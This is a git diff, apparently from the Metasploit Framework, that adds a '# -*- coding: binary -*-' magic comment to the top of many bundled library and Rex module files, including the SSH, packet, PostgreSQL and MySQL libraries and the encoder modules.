diff --git a/lib/net/ssh/transport/session.rb b/lib/net/ssh/transport/session.rb
index 55e846a076..d78f12b811 100644
--- a/lib/net/ssh/transport/session.rb
+++ b/lib/net/ssh/transport/session.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'timeout'
diff --git a/lib/net/ssh/transport/state.rb b/lib/net/ssh/transport/state.rb
index 2d8a3ddaa9..165f0cce95 100644
--- a/lib/net/ssh/transport/state.rb
+++ b/lib/net/ssh/transport/state.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'zlib'
require 'net/ssh/transport/cipher_factory'
require 'net/ssh/transport/hmac'
diff --git a/lib/net/ssh/utils.rb b/lib/net/ssh/utils.rb
index 2af30837b8..f6af0f45b5 100644
--- a/lib/net/ssh/utils.rb
+++ b/lib/net/ssh/utils.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh'
require 'rex'
diff --git a/lib/net/ssh/utils.rb.ut.rb b/lib/net/ssh/utils.rb.ut.rb
index 5aa3c44f4e..839684a94c 100644
--- a/lib/net/ssh/utils.rb.ut.rb
+++ b/lib/net/ssh/utils.rb.ut.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh'
require 'test/unit'
diff --git a/lib/net/ssh/verifiers/lenient.rb b/lib/net/ssh/verifiers/lenient.rb
index 5026550753..9ac6143846 100644
--- a/lib/net/ssh/verifiers/lenient.rb
+++ b/lib/net/ssh/verifiers/lenient.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/verifiers/strict'
module Net; module SSH; module Verifiers
diff --git a/lib/net/ssh/verifiers/null.rb b/lib/net/ssh/verifiers/null.rb
index d88afb9968..313159503c 100644
--- a/lib/net/ssh/verifiers/null.rb
+++ b/lib/net/ssh/verifiers/null.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Verifiers
# The Null host key verifier simply allows every key it sees, without
diff --git a/lib/net/ssh/verifiers/strict.rb b/lib/net/ssh/verifiers/strict.rb
index ed7e8abe03..5e16248ac4 100644
--- a/lib/net/ssh/verifiers/strict.rb
+++ b/lib/net/ssh/verifiers/strict.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
require 'net/ssh/known_hosts'
diff --git a/lib/net/ssh/version.rb b/lib/net/ssh/version.rb
index 3e677fb9e3..be54251d0b 100644
--- a/lib/net/ssh/version.rb
+++ b/lib/net/ssh/version.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH
# A class for describing the current version of a library. The version
# consists of three parts: the +major+ number, the +minor+ number, and the
diff --git a/lib/packetfu.rb b/lib/packetfu.rb
index 86bb6e0bb2..e87b02f46f 100644
--- a/lib/packetfu.rb
+++ b/lib/packetfu.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
end
require 'packetfu/packetfu'
diff --git a/lib/packetfu/packetfu.rb b/lib/packetfu/packetfu.rb
index 744a87e589..5bf29b0f40 100644
--- a/lib/packetfu/packetfu.rb
+++ b/lib/packetfu/packetfu.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# :title: PacketFu Documentation
# :main: README
diff --git a/lib/packetfu/packetfu/capture.rb b/lib/packetfu/packetfu/capture.rb
index 5aa6594692..137b1b5781 100644
--- a/lib/packetfu/packetfu/capture.rb
+++ b/lib/packetfu/packetfu/capture.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# The Capture class is used to construct PcapRub objects in order to collect
diff --git a/lib/packetfu/packetfu/config.rb b/lib/packetfu/packetfu/config.rb
index 98ebd5958b..3c816e1d5c 100644
--- a/lib/packetfu/packetfu/config.rb
+++ b/lib/packetfu/packetfu/config.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# The Config class holds various bits of useful default information
diff --git a/lib/packetfu/packetfu/inject.rb b/lib/packetfu/packetfu/inject.rb
index 74d70fea09..19114a8522 100644
--- a/lib/packetfu/packetfu/inject.rb
+++ b/lib/packetfu/packetfu/inject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# The Inject class handles injecting arrays of binary data on the wire.
diff --git a/lib/packetfu/packetfu/packet.rb b/lib/packetfu/packetfu/packet.rb
index e04140d6fc..86c77bf9ff 100644
--- a/lib/packetfu/packetfu/packet.rb
+++ b/lib/packetfu/packetfu/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# Packet is the parent class of EthPacket, IPPacket, UDPPacket, TCPPacket, and all
diff --git a/lib/packetfu/packetfu/pcap.rb b/lib/packetfu/packetfu/pcap.rb
index b84ab994d4..fa783ab6df 100644
--- a/lib/packetfu/packetfu/pcap.rb
+++ b/lib/packetfu/packetfu/pcap.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module StructFu
diff --git a/lib/packetfu/packetfu/protos/arp.rb b/lib/packetfu/packetfu/protos/arp.rb
index a238e71422..3145fff40a 100644
--- a/lib/packetfu/packetfu/protos/arp.rb
+++ b/lib/packetfu/packetfu/protos/arp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# ARPHeader is a complete ARP struct, used in ARPPacket.
diff --git a/lib/packetfu/packetfu/protos/eth.rb b/lib/packetfu/packetfu/protos/eth.rb
index 84a5eb4daa..6e8f6f7dd3 100644
--- a/lib/packetfu/packetfu/protos/eth.rb
+++ b/lib/packetfu/packetfu/protos/eth.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# EthOui is the Organizationally Unique Identifier portion of a MAC address, used in EthHeader.
diff --git a/lib/packetfu/packetfu/protos/hsrp.rb b/lib/packetfu/packetfu/protos/hsrp.rb
index 24a2d85952..c763568a2c 100644
--- a/lib/packetfu/packetfu/protos/hsrp.rb
+++ b/lib/packetfu/packetfu/protos/hsrp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# HSRPHeader is a complete HSRP struct, used in HSRPPacket. HSRP is typically used for
diff --git a/lib/packetfu/packetfu/protos/icmp.rb b/lib/packetfu/packetfu/protos/icmp.rb
index 5860eb649a..943471d82e 100644
--- a/lib/packetfu/packetfu/protos/icmp.rb
+++ b/lib/packetfu/packetfu/protos/icmp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# ICMPHeader is a complete ICMP struct, used in ICMPPacket. ICMP is
diff --git a/lib/packetfu/packetfu/protos/invalid.rb b/lib/packetfu/packetfu/protos/invalid.rb
index d63de22834..9630287842 100644
--- a/lib/packetfu/packetfu/protos/invalid.rb
+++ b/lib/packetfu/packetfu/protos/invalid.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# InvalidHeader catches all packets that we don't already have a Struct for,
diff --git a/lib/packetfu/packetfu/protos/ip.rb b/lib/packetfu/packetfu/protos/ip.rb
index d524d43dd7..4c503644ae 100644
--- a/lib/packetfu/packetfu/protos/ip.rb
+++ b/lib/packetfu/packetfu/protos/ip.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'ipaddr'
module PacketFu
diff --git a/lib/packetfu/packetfu/protos/ipv6.rb b/lib/packetfu/packetfu/protos/ipv6.rb
index d8b97dee64..035aaa1728 100644
--- a/lib/packetfu/packetfu/protos/ipv6.rb
+++ b/lib/packetfu/packetfu/protos/ipv6.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# AddrIpv6 handles addressing for IPv6Header
diff --git a/lib/packetfu/packetfu/protos/tcp.rb b/lib/packetfu/packetfu/protos/tcp.rb
index 06f3eec48b..3eb8d40a69 100644
--- a/lib/packetfu/packetfu/protos/tcp.rb
+++ b/lib/packetfu/packetfu/protos/tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# Implements the Explict Congestion Notification for TCPHeader.
diff --git a/lib/packetfu/packetfu/protos/udp.rb b/lib/packetfu/packetfu/protos/udp.rb
index 685da19d5a..1ecff551cd 100644
--- a/lib/packetfu/packetfu/protos/udp.rb
+++ b/lib/packetfu/packetfu/protos/udp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# UDPHeader is a complete UDP struct, used in UDPPacket. Many Internet-critical protocols
diff --git a/lib/packetfu/packetfu/structfu.rb b/lib/packetfu/packetfu/structfu.rb
index aa7d58aec4..d12ddfbfef 100644
--- a/lib/packetfu/packetfu/structfu.rb
+++ b/lib/packetfu/packetfu/structfu.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# StructFu, a nifty way to leverage Ruby's built in Struct class
# to create meaningful binary data.
diff --git a/lib/packetfu/packetfu/utils.rb b/lib/packetfu/packetfu/utils.rb
index b1e3d93fea..51574da435 100644
--- a/lib/packetfu/packetfu/utils.rb
+++ b/lib/packetfu/packetfu/utils.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'singleton'
module PacketFu
diff --git a/lib/packetfu/packetfu/version.rb b/lib/packetfu/packetfu/version.rb
index 8d2e08d76c..3f2b6c1992 100644
--- a/lib/packetfu/packetfu/version.rb
+++ b/lib/packetfu/packetfu/version.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# Check the repo's for version release histories
diff --git a/lib/postgres/binary_reader.rb b/lib/postgres/binary_reader.rb
index a5c7ec7449..0d0611e393 100644
--- a/lib/postgres/binary_reader.rb
+++ b/lib/postgres/binary_reader.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'postgres_msf'
require 'postgres/byteorder'
diff --git a/lib/postgres/binary_writer.rb b/lib/postgres/binary_writer.rb
index e8d2579452..d0f478204f 100644
--- a/lib/postgres/binary_writer.rb
+++ b/lib/postgres/binary_writer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'postgres_msf'
require 'postgres/byteorder'
diff --git a/lib/postgres/buffer.rb b/lib/postgres/buffer.rb
index 1c5f988fd6..75d14bc91c 100644
--- a/lib/postgres/buffer.rb
+++ b/lib/postgres/buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'postgres_msf'
require 'postgres/binary_writer'
require 'postgres/binary_reader'
diff --git a/lib/postgres/byteorder.rb b/lib/postgres/byteorder.rb
index f12c54dacc..b8c51528c3 100644
--- a/lib/postgres/byteorder.rb
+++ b/lib/postgres/byteorder.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'postgres_msf'
# Namespace for Metasploit branch.
diff --git a/lib/postgres/postgres-pr/connection.rb b/lib/postgres/postgres-pr/connection.rb
index 68210bd30c..db8cc2d962 100644
--- a/lib/postgres/postgres-pr/connection.rb
+++ b/lib/postgres/postgres-pr/connection.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# Author:: Michael Neumann
# Copyright:: (c) 2005 by Michael Neumann
diff --git a/lib/postgres/postgres-pr/message.rb b/lib/postgres/postgres-pr/message.rb
index 781d595071..643b688cdd 100644
--- a/lib/postgres/postgres-pr/message.rb
+++ b/lib/postgres/postgres-pr/message.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# Author:: Michael Neumann
# Copyright:: (c) 2005 by Michael Neumann
diff --git a/lib/postgres/postgres-pr/postgres-compat.rb b/lib/postgres/postgres-pr/postgres-compat.rb
index 52c44b3990..42618ebefc 100644
--- a/lib/postgres/postgres-pr/postgres-compat.rb
+++ b/lib/postgres/postgres-pr/postgres-compat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# This is a compatibility layer for using the pure Ruby postgres-pr instead of
# the C interface of postgres.
diff --git a/lib/postgres/postgres-pr/typeconv/array.rb b/lib/postgres/postgres-pr/typeconv/array.rb
index 235d545220..dd4ee749fc 100644
--- a/lib/postgres/postgres-pr/typeconv/array.rb
+++ b/lib/postgres/postgres-pr/typeconv/array.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'strscan'
module Postgres::Conversion
diff --git a/lib/postgres/postgres-pr/typeconv/bytea.rb b/lib/postgres/postgres-pr/typeconv/bytea.rb
index 7c43ac9e54..ca9128fc9f 100644
--- a/lib/postgres/postgres-pr/typeconv/bytea.rb
+++ b/lib/postgres/postgres-pr/typeconv/bytea.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Postgres::Conversion
#
diff --git a/lib/postgres/postgres-pr/typeconv/conv.rb b/lib/postgres/postgres-pr/typeconv/conv.rb
index c2f9ee0899..8402b22e95 100644
--- a/lib/postgres/postgres-pr/typeconv/conv.rb
+++ b/lib/postgres/postgres-pr/typeconv/conv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Postgres
module Conversion
class ConversionError < Exception; end
diff --git a/lib/postgres/postgres-pr/version.rb b/lib/postgres/postgres-pr/version.rb
index 821fb8f375..52fdc52816 100644
--- a/lib/postgres/postgres-pr/version.rb
+++ b/lib/postgres/postgres-pr/version.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Namespace for Metasploit branch.
module Msf
module Db
diff --git a/lib/postgres_msf.rb b/lib/postgres_msf.rb
index 8a89767a64..7f2ece6d7b 100644
--- a/lib/postgres_msf.rb
+++ b/lib/postgres_msf.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# "Pure Ruby PostgreSQL interface," also known as "Postgres-PR" is:
# Copyright (c) 2005, 2008 by Michael Neumann (mneumann@ntecs.de).
#
diff --git a/lib/postgres_msf.rb.ut.rb b/lib/postgres_msf.rb.ut.rb
index d4080f0e99..5feff33349 100644
--- a/lib/postgres_msf.rb.ut.rb
+++ b/lib/postgres_msf.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
require 'postgres_msf'
diff --git a/lib/rbmysql.rb b/lib/rbmysql.rb
index 9d7eead42c..68f2fbdf69 100644
--- a/lib/rbmysql.rb
+++ b/lib/rbmysql.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2008-2009 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbmysql/charset.rb b/lib/rbmysql/charset.rb
index a285ceb412..d52b6c50a8 100644
--- a/lib/rbmysql/charset.rb
+++ b/lib/rbmysql/charset.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2008 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbmysql/compat.rb b/lib/rbmysql/compat.rb
index 025be22f58..3df7441201 100644
--- a/lib/rbmysql/compat.rb
+++ b/lib/rbmysql/compat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2008 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbmysql/constants.rb b/lib/rbmysql/constants.rb
index bdbc798693..5b6c1713e7 100644
--- a/lib/rbmysql/constants.rb
+++ b/lib/rbmysql/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2003-2008 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbmysql/error.rb b/lib/rbmysql/error.rb
index 5f6cef1f69..bf3b5d56ad 100644
--- a/lib/rbmysql/error.rb
+++ b/lib/rbmysql/error.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2003-2008 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbmysql/protocol.rb b/lib/rbmysql/protocol.rb
index 641a39d690..243cb094d6 100644
--- a/lib/rbmysql/protocol.rb
+++ b/lib/rbmysql/protocol.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2008-2009 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbreadline.rb b/lib/rbreadline.rb
index dfccf9dfe6..1597ec0072 100644
--- a/lib/rbreadline.rb
+++ b/lib/rbreadline.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# rbreadline.rb -- a general facility for reading lines of input
# with emacs style editing and completion.
diff --git a/lib/rex/arch.rb b/lib/rex/arch.rb
index 5863f8ae78..bd6699d803 100644
--- a/lib/rex/arch.rb
+++ b/lib/rex/arch.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/constants'
module Rex
diff --git a/lib/rex/arch/sparc.rb b/lib/rex/arch/sparc.rb
index 827e41b746..1720aed6d5 100644
--- a/lib/rex/arch/sparc.rb
+++ b/lib/rex/arch/sparc.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Arch
diff --git a/lib/rex/arch/sparc.rb.ut.rb b/lib/rex/arch/sparc.rb.ut.rb
index 92bac960bb..bbe953fcab 100644
--- a/lib/rex/arch/sparc.rb.ut.rb
+++ b/lib/rex/arch/sparc.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/arch/x86.rb b/lib/rex/arch/x86.rb
index 98598a01e5..16671ca21f 100644
--- a/lib/rex/arch/x86.rb
+++ b/lib/rex/arch/x86.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Arch
diff --git a/lib/rex/arch/x86.rb.ut.rb b/lib/rex/arch/x86.rb.ut.rb
index 7b1bb63265..de1f0292d0 100644
--- a/lib/rex/arch/x86.rb.ut.rb
+++ b/lib/rex/arch/x86.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/assembly/nasm.rb b/lib/rex/assembly/nasm.rb
index 281ac48d1f..c2c35d6859 100644
--- a/lib/rex/assembly/nasm.rb
+++ b/lib/rex/assembly/nasm.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'tempfile'
require 'rex/file'
diff --git a/lib/rex/assembly/nasm.rb.ut.rb b/lib/rex/assembly/nasm.rb.ut.rb
index a6579e01df..a4c4f27c6f 100644
--- a/lib/rex/assembly/nasm.rb.ut.rb
+++ b/lib/rex/assembly/nasm.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/compat.rb b/lib/rex/compat.rb
index f45b753503..cd01eb7072 100644
--- a/lib/rex/compat.rb
+++ b/lib/rex/compat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
###
diff --git a/lib/rex/constants.rb b/lib/rex/constants.rb
index 58b0f020e6..c6a3958297 100644
--- a/lib/rex/constants.rb
+++ b/lib/rex/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# Log severities
#
diff --git a/lib/rex/elfparsey.rb b/lib/rex/elfparsey.rb
index fc4aabc00d..a9f891066a 100644
--- a/lib/rex/elfparsey.rb
+++ b/lib/rex/elfparsey.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfparsey/elf.rb b/lib/rex/elfparsey/elf.rb
index c673d1e6d7..9d9811f6d5 100644
--- a/lib/rex/elfparsey/elf.rb
+++ b/lib/rex/elfparsey/elf.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfparsey/elfbase.rb b/lib/rex/elfparsey/elfbase.rb
index 4fa430b715..be5691e2d8 100644
--- a/lib/rex/elfparsey/elfbase.rb
+++ b/lib/rex/elfparsey/elfbase.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfparsey/exceptions.rb b/lib/rex/elfparsey/exceptions.rb
index cfd84c2e57..4e3804424f 100644
--- a/lib/rex/elfparsey/exceptions.rb
+++ b/lib/rex/elfparsey/exceptions.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfscan.rb b/lib/rex/elfscan.rb
index a1113b16d2..d3e66affbc 100644
--- a/lib/rex/elfscan.rb
+++ b/lib/rex/elfscan.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfscan/scanner.rb b/lib/rex/elfscan/scanner.rb
index eaaae51596..115aa0977d 100644
--- a/lib/rex/elfscan/scanner.rb
+++ b/lib/rex/elfscan/scanner.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfscan/search.rb b/lib/rex/elfscan/search.rb
index 509257f0f2..80f7be017c 100644
--- a/lib/rex/elfscan/search.rb
+++ b/lib/rex/elfscan/search.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/encoder/alpha2.rb b/lib/rex/encoder/alpha2.rb
index 3db46b0996..3a10e9abac 100644
--- a/lib/rex/encoder/alpha2.rb
+++ b/lib/rex/encoder/alpha2.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# ________________________________________________________________________________
diff --git a/lib/rex/encoder/alpha2/alpha_mixed.rb b/lib/rex/encoder/alpha2/alpha_mixed.rb
index d7b421c09c..cc35c1a2b5 100644
--- a/lib/rex/encoder/alpha2/alpha_mixed.rb
+++ b/lib/rex/encoder/alpha2/alpha_mixed.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/alpha2/generic'
diff --git a/lib/rex/encoder/alpha2/alpha_upper.rb b/lib/rex/encoder/alpha2/alpha_upper.rb
index e510c10b0e..0cb12c0e1a 100644
--- a/lib/rex/encoder/alpha2/alpha_upper.rb
+++ b/lib/rex/encoder/alpha2/alpha_upper.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/alpha2/generic'
diff --git a/lib/rex/encoder/alpha2/generic.rb b/lib/rex/encoder/alpha2/generic.rb
index e775a786e6..13833d10e4 100644
--- a/lib/rex/encoder/alpha2/generic.rb
+++ b/lib/rex/encoder/alpha2/generic.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/text'
diff --git a/lib/rex/encoder/alpha2/unicode_mixed.rb b/lib/rex/encoder/alpha2/unicode_mixed.rb
index 80db0b3423..999a2d25fe 100644
--- a/lib/rex/encoder/alpha2/unicode_mixed.rb
+++ b/lib/rex/encoder/alpha2/unicode_mixed.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/alpha2/generic'
diff --git a/lib/rex/encoder/alpha2/unicode_upper.rb b/lib/rex/encoder/alpha2/unicode_upper.rb
index d3934b2d7a..2e062bce34 100644
--- a/lib/rex/encoder/alpha2/unicode_upper.rb
+++ b/lib/rex/encoder/alpha2/unicode_upper.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/alpha2/generic'
diff --git a/lib/rex/encoder/ndr.rb b/lib/rex/encoder/ndr.rb
index 3f7a2c0168..99331ed79f 100644
--- a/lib/rex/encoder/ndr.rb
+++ b/lib/rex/encoder/ndr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/text"
module Rex
diff --git a/lib/rex/encoder/ndr.rb.ut.rb b/lib/rex/encoder/ndr.rb.ut.rb
index b4034cc673..4c425e8345 100644
--- a/lib/rex/encoder/ndr.rb.ut.rb
+++ b/lib/rex/encoder/ndr.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/encoder/nonalpha.rb b/lib/rex/encoder/nonalpha.rb
index cc6927768f..8cff4190fe 100644
--- a/lib/rex/encoder/nonalpha.rb
+++ b/lib/rex/encoder/nonalpha.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/text'
diff --git a/lib/rex/encoder/nonupper.rb b/lib/rex/encoder/nonupper.rb
index ab2bed2de6..d7a598620a 100644
--- a/lib/rex/encoder/nonupper.rb
+++ b/lib/rex/encoder/nonupper.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/text'
diff --git a/lib/rex/encoder/xdr.rb b/lib/rex/encoder/xdr.rb
index 17e2ddcd43..7ba2f29dcf 100644
--- a/lib/rex/encoder/xdr.rb
+++ b/lib/rex/encoder/xdr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Encoder
diff --git a/lib/rex/encoder/xdr.rb.ut.rb b/lib/rex/encoder/xdr.rb.ut.rb
index 3c982276ab..01e1666a5e 100644
--- a/lib/rex/encoder/xdr.rb.ut.rb
+++ b/lib/rex/encoder/xdr.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/encoder/xor.rb b/lib/rex/encoder/xor.rb
index 5474e92465..e78a824919 100644
--- a/lib/rex/encoder/xor.rb
+++ b/lib/rex/encoder/xor.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Encoder
diff --git a/lib/rex/encoder/xor/dword.rb b/lib/rex/encoder/xor/dword.rb
index 3bfb29baa7..b94a9ea3d8 100644
--- a/lib/rex/encoder/xor/dword.rb
+++ b/lib/rex/encoder/xor/dword.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/xor'
require 'rex/encoding/xor/dword'
diff --git a/lib/rex/encoder/xor/dword_additive.rb b/lib/rex/encoder/xor/dword_additive.rb
index b63f9df198..02ff7ce62b 100644
--- a/lib/rex/encoder/xor/dword_additive.rb
+++ b/lib/rex/encoder/xor/dword_additive.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/xor'
require 'rex/encoding/xor/dword_additive'
diff --git a/lib/rex/encoders/xor_dword.rb b/lib/rex/encoders/xor_dword.rb
index 70b8d885c5..7039c0dca6 100644
--- a/lib/rex/encoders/xor_dword.rb
+++ b/lib/rex/encoders/xor_dword.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/arch/x86'
require 'rex/encoder/xor/dword'
diff --git a/lib/rex/encoders/xor_dword_additive.rb b/lib/rex/encoders/xor_dword_additive.rb
index a6ef4b5866..0c687f5a14 100644
--- a/lib/rex/encoders/xor_dword_additive.rb
+++ b/lib/rex/encoders/xor_dword_additive.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/xor/dword_additive'
diff --git a/lib/rex/encoders/xor_dword_additive.rb.ut.rb b/lib/rex/encoders/xor_dword_additive.rb.ut.rb
index f71a470cdd..b54737283f 100644
--- a/lib/rex/encoders/xor_dword_additive.rb.ut.rb
+++ b/lib/rex/encoders/xor_dword_additive.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'dev', 'machinetest'))
diff --git a/lib/rex/encoding/xor.rb b/lib/rex/encoding/xor.rb
index 502e5800f5..e25664aac9 100644
--- a/lib/rex/encoding/xor.rb
+++ b/lib/rex/encoding/xor.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# make sure the namespace is created
diff --git a/lib/rex/encoding/xor.rb.ts.rb b/lib/rex/encoding/xor.rb.ts.rb
index 85d34c080e..211fd64983 100644
--- a/lib/rex/encoding/xor.rb.ts.rb
+++ b/lib/rex/encoding/xor.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/encoding/xor/byte.rb b/lib/rex/encoding/xor/byte.rb
index a72ae4ca2a..809c0b0aea 100644
--- a/lib/rex/encoding/xor/byte.rb
+++ b/lib/rex/encoding/xor/byte.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/generic'
diff --git a/lib/rex/encoding/xor/byte.rb.ut.rb b/lib/rex/encoding/xor/byte.rb.ut.rb
index 902d351b53..8259a7c993 100644
--- a/lib/rex/encoding/xor/byte.rb.ut.rb
+++ b/lib/rex/encoding/xor/byte.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/encoding/xor/dword.rb b/lib/rex/encoding/xor/dword.rb
index f4bea0b2af..212ca33b57 100644
--- a/lib/rex/encoding/xor/dword.rb
+++ b/lib/rex/encoding/xor/dword.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/generic'
diff --git a/lib/rex/encoding/xor/dword.rb.ut.rb b/lib/rex/encoding/xor/dword.rb.ut.rb
